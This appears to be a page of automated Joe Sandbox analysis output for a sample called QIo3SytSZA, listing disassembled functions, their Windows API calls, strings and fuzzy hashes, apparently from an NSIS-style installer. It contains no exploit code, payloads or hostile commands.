Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNEL32(00000000), ref: 00402387

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

..., xrefs: 004062BF
%02x%c, xrefs: 0040629C

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424CAD,76F923A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393645808.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_QIo3SytSZA.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.1393458130.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1393433736.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393481459.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1393504937.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
